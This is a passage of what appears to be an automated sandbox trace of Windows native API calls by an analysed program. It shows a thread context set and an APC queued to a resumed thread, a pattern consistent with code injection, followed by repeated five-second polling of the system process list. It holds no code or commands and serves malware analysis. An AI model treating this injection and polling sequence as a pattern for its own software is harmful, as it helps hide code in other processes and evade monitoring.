[40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x1, Esi=0x1, Ebx=0x1, Edx=0x0, Ecx=0x0, Eax=0xe8, Ebp=0x19f7cc, Eip=0x9a79707, SegCs=0x23, EFlags=0x206, Esp=0x19f63c, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0173.762] NtQueueApcThread (ThreadHandle=0xb4, ApcRoutine=0x9a7970c, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0173.762] NtResumeThread (in: ThreadHandle=0xb4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0173.979] NtClose (Handle=0x138) returned 0x0 [0173.979] NtClose (Handle=0xb4) returned 0x0 [0173.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.990] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0174.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0174.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0174.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0174.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0174.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0174.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.744] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0174.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0174.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0174.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0174.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0174.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0175.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.239] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0175.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0175.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0175.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0175.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0175.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0175.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.664] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0175.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0175.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0175.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0175.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0175.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0175.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.999] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0176.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0176.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0176.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0176.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0176.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0176.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.494] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0176.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0176.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0176.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0176.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0176.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0176.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0176.848] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0176.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0176.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0176.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0176.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0176.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0177.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.172] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0177.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0177.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0177.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0177.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0177.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0177.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.532] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0177.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0177.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0177.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0177.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0177.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0177.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0177.725] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0177.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0177.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0177.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0177.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0177.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0178.036] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.037] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0178.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0178.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0178.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0178.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0178.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0178.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.284] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0178.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0178.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0178.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0178.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0178.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0178.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.495] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0178.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0178.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0178.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0178.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0178.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0178.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.931] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0178.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0178.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0178.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0178.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0178.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0179.237] NtFreeVirtualMemory 